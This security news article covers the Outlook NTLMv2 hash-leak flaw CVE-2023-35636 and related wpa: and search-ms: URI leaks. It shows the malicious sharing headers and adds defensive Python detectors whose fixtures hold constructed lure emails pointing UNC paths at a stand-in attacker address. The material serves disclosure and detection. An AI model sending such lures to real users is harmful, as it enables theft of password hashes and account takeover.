New Outlook Vulnerability Allows Attackers to Steal NTLM Hashes

Critical vulnerability in Outlook

A new critical vulnerability has been discovered in Microsoft Outlook that could allow attackers to steal users' NTLMv2 password hashes. Security researchers at Varonis Threat Labs recently revealed that they have found a way to exploit Outlook's calendar-sharing feature to intercept those hashes.

NTLMv2 (NT Lan Manager version 2) is an authentication protocol commonly used in Windows networks. Though more secure than previous versions, researchers say NTLMv2 is still vulnerable to offline brute-force attacks. With access to the hashed passwords, attackers could crack them and gain access to user accounts.

Varonis disclosed the vulnerability, dubbed CVE-2023-35636, to Microsoft in July. Microsoft categorized it as an "important" vulnerability and issued a patch on December 12th. However, systems that have not yet installed the update remain at risk.

In addition to the Outlook exploit, Varonis found two other methods to obtain NTLMv2 hashes by taking advantage of Windows components like the Windows Performance Analyzer (WPA) tool and Windows File Explorer. They reported these issues to Microsoft as well, but so far Microsoft has only classified them as "moderate severity."

How the Outlook Exploit Works

The Outlook exploit works by adding two specific headers to an email:

  1. Content-Class: Sharing
  2. x-sharing-config-url: \\(Attacker IP)\test.ics

The first header signals that the email contains sharing content. The second points to a configuration file on the attacker's server.

If the victim clicks "Open this iCal" in the message, Outlook will attempt to retrieve that configuration file. This causes Outlook to authenticate to the attacker's server using the victim's NTLMv2 hash. The attacker can then intercept the hashed password for offline cracking.

This vulnerability lets a remote attacker obtain password hashes with no user interaction beyond opening the email and clicking the "Open this iCal" button. The Varonis team proved the attack works by collecting hashes using a tool called Responder.

Once hashes are obtained, attackers can crack them through an offline brute-force attack: candidate passwords are hashed and compared against the captured hash on the attacker's own systems. Because the cracking happens entirely offline, it generates no network activity in the victim's environment and is therefore difficult to detect.

With access to plaintext passwords, hackers can easily impersonate users and access sensitive systems and data.

Other Methods Discovered to Leak NTLM Hashes

In addition to the Outlook exploit, Varonis disclosed two other methods to obtain password hashes by taking advantage of Windows tools like WPA and File Explorer.

The WPA attack works by including a malicious "wpa://" link in an email or website. When users click this link, the Windows Performance Analyzer tool launches and attempts to authenticate to the attacker's server using NTLMv2. This sends the hash over the public internet where it can be intercepted.

The Windows File Explorer attack is executed similarly, using the "search-ms://" URI handler. By inserting attacker-controlled paths in the URI, hackers can force File Explorer to authenticate to a remote server and expose the NTLMv2 hash.

For these attacks, Microsoft has not yet issued patches, citing only "moderate severity." Still, unpatched systems are vulnerable to phishing attempts using these techniques.
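As an added defensive example (my own code, not from the article or from Varonis), the following Python script shows how a mail gateway or mailbox triage job could flag the header pair described in the Outlook section above and the wpa:/search-ms: URIs described in this section. The messages, hosts and paths are constructed placeholders; the assumption that legitimate Exchange sharing invitations carry an HTTPS configuration URL is mine.

```python
"""Detect e-mail lures that coerce Outlook or Windows into an outbound NTLM
authentication: the Content-Class / x-sharing-config-url header pair, and
wpa: or search-ms: URIs that carry a remote (UNC) path.

Constructed example for illustration; the messages and hosts are placeholders."""
import re
from email import message_from_string
from email.message import Message
from typing import Dict, List
from urllib.parse import urlparse

# A value beginning with \\host\ is a UNC path: fetching it makes the client
# authenticate to "host" over SMB or WebDAV, which is what leaks the hash.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
# URI handlers the article names as alternative leak paths.
URI_RE = re.compile(r"\b(wpa|search-ms):[^\s\"'<>]*", re.IGNORECASE)
# A remote location inside such a URI, raw or percent-encoded.
REMOTE_IN_URI = re.compile(r"\\\\|%5c%5c|file:", re.IGNORECASE)

# Constructed sample messages (not captured samples). 192.0.2.10 is a
# documentation address standing in for an attacker-controlled host.
SHARING_LURE = r"""From: sender@example.test
To: victim@example.test
Subject: Shared calendar
Content-Class: Sharing
x-sharing-config-url: \\192.0.2.10\test.ics
Content-Type: text/plain

Please open the shared calendar.
"""

SEARCH_LURE = r"""From: sender@example.test
To: victim@example.test
Subject: Please review
Content-Type: text/html

<p>Results: <a href="search-ms:query=report&crumb=location:\\192.0.2.10\share">Open search</a></p>
"""

BENIGN = """From: colleague@example.test
To: victim@example.test
Subject: Shared calendar
Content-Class: Sharing
x-sharing-config-url: https://mail.example.test/calendar/shared.ics
Content-Type: text/plain

Calendar shared via Exchange.
"""


def _text_parts(msg: Message) -> str:
    """Decoded text of every text/* part (the message itself when not multipart)."""
    chunks = []
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def analyze_message(raw: str) -> List[str]:
    """Return the findings for one RFC 822 message (empty list when nothing is suspicious)."""
    msg = message_from_string(raw)
    findings: List[str] = []

    config_url = (msg.get("x-sharing-config-url") or "").strip()
    if config_url:
        if UNC_RE.match(config_url) or config_url.lower().startswith("file:"):
            findings.append(f"UNC/file sharing config URL: {config_url}")
        elif urlparse(config_url).scheme.lower() != "https":
            # Assumption: genuine sharing invitations point at an HTTPS endpoint.
            findings.append(f"non-HTTPS sharing config URL: {config_url}")

    for match in URI_RE.finditer(_text_parts(msg)):
        uri, scheme = match.group(0), match.group(1).lower()
        # Any wpa: link is unexpected in mail; search-ms: only when it names a remote location.
        if scheme == "wpa" or REMOTE_IN_URI.search(uri):
            findings.append(f"{scheme}: URI with remote path: {uri}")
    return findings


def triage(mailbox: Dict[str, str]) -> Dict[str, List[str]]:
    """Map message id -> findings, keeping only messages that produced findings."""
    return {mid: f for mid, raw in mailbox.items() if (f := analyze_message(raw))}


if __name__ == "__main__":
    for mid, found in triage({"1": SHARING_LURE, "2": SEARCH_LURE, "3": BENIGN}).items():
        print(mid, found)
```

The header check deliberately keys on the value of x-sharing-config-url rather than on the presence of Content-Class: Sharing, since real calendar-sharing invitations carry both headers; what distinguishes the lure is a UNC or file path that forces an SMB or WebDAV fetch.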

Protection Against NTLMv2 Hash-Theft Attacks

To protect against these kinds of password-stealing attacks, Varonis suggests the following measures:

  • Enable SMB signing to validate the integrity of NTLMv2 authentication attempts.
  • Block outgoing NTLMv2 traffic completely. Windows 11 allows this starting with build 25951.
  • Enforce Kerberos authentication over NTLMv2 when possible. Kerberos uses stronger encryption and key exchange methods.
  • Monitor network activity for signs of NTLMv2 relay attacks.
  • Encourage strong password policies among users. Stronger passwords resist brute-force cracking.
  • Deploy multi-factor authentication for secure remote access and VPNs.
  • Keep all apps and operating systems patched and updated.
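As an added example of the monitoring item in the list above (my own code, not Varonis guidance), this Python snippet scans constructed firewall log lines for outbound SMB (TCP 139/445) and WebDAV connections from internal hosts to addresses outside the organization's ranges, which is the path a coerced NTLMv2 response takes to an attacker's server. Windows falls back to WebDAV over HTTP when outbound SMB is unreachable, so both transports are checked. The log format, addresses and user-agent value are placeholders.

```python
"""Flag coerced-authentication egress in firewall logs: outbound SMB
(TCP 139/445) or WebDAV traffic from internal hosts to external addresses.

Constructed example; log format, addresses and user agents are placeholders."""
import ipaddress
import re
from collections import Counter
from typing import Dict, List, Optional

SMB_PORTS = {139, 445}
WEB_PORTS = {80, 443}
# Address space treated as "inside"; RFC 1918 plus loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# External SMB/WebDAV peers that are expected (e.g. a sanctioned cloud file service).
ALLOWLIST = set()
KV_RE = re.compile(r"(\w+)=(\S+)")

# Constructed log lines in a generic "timestamp key=value ..." format.
LOG_LINES = [
    "2024-01-10T09:12:01Z src=10.20.30.41 dst=10.20.30.5 dport=445 proto=tcp action=allow",
    "2024-01-10T09:12:07Z src=10.20.30.41 dst=203.0.113.8 dport=445 proto=tcp action=deny",
    "2024-01-10T09:12:09Z src=10.20.30.41 dst=203.0.113.8 dport=80 proto=tcp action=allow "
    "user_agent=Microsoft-WebDAV-MiniRedir/10.0.22621",
    "2024-01-10T09:13:44Z src=10.20.30.77 dst=198.51.100.20 dport=443 proto=tcp action=allow user_agent=Mozilla/5.0",
    "2024-01-10T09:15:02Z src=10.20.30.90 dst=198.51.100.33 dport=445 proto=tcp action=allow",
]


def parse_line(line: str) -> Dict[str, str]:
    """Split one record into a dict; the leading timestamp lands under 'ts'."""
    fields = dict(KV_RE.findall(line))
    fields["ts"] = line.split(" ", 1)[0]
    return fields


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify(fields: Dict[str, str]) -> Optional[str]:
    """Name the suspicious egress type for one record, or None when it is benign."""
    dst, port = fields.get("dst"), int(fields.get("dport", "0"))
    if dst is None or is_internal(dst) or dst in ALLOWLIST:
        return None
    # A denied attempt still means something on the host was coerced into connecting.
    blocked = "" if fields.get("action") == "allow" else "-blocked"
    if port in SMB_PORTS:
        return "smb-egress" + blocked
    if port in WEB_PORTS and "webdav" in fields.get("user_agent", "").lower():
        # The WebClient service identifies itself as Microsoft-WebDAV-MiniRedir.
        return "webdav-egress" + blocked
    return None


def find_ntlm_egress(lines: List[str]) -> List[Dict[str, object]]:
    """Return one alert dict per record that classify() marks as suspicious."""
    alerts = []
    for line in lines:
        fields = parse_line(line)
        kind = classify(fields)
        if kind:
            alerts.append({"ts": fields["ts"], "src": fields["src"], "dst": fields["dst"],
                           "dport": int(fields["dport"]), "kind": kind})
    return alerts


def hosts_by_alert_count(alerts: List[Dict[str, object]]) -> Counter:
    """Rank internal source hosts by how many suspicious connections they made."""
    return Counter(str(a["src"]) for a in alerts)


if __name__ == "__main__":
    alerts = find_ntlm_egress(LOG_LINES)
    for alert in alerts:
        print(alert)
    print(hosts_by_alert_count(alerts))
```

A host that shows both a blocked TCP/445 attempt and a WebDAV connection to the same external address within seconds, as the constructed lines for 10.20.30.41 do, is the pattern to prioritise: the SMB block worked, and the WebDAV fallback is where the hash would actually leave.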

Millions of Outlook Users at Risk

This new vulnerability puts millions of Outlook users at risk until patches are widely adopted. Given Outlook's widespread corporate use, the exploit has the potential to provide attackers access to sensitive systems and data at many organizations.

Users are recommended to install the latest Microsoft security updates as soon as possible. Administrators may want to expedite patching for Outlook and proactively monitor for signs of exploitation attempts in their environments.

Stay tuned for more details as Microsoft and the security community analyze the impact of this newly reported vulnerability. We'll post updates if any additional protective measures or details emerge.
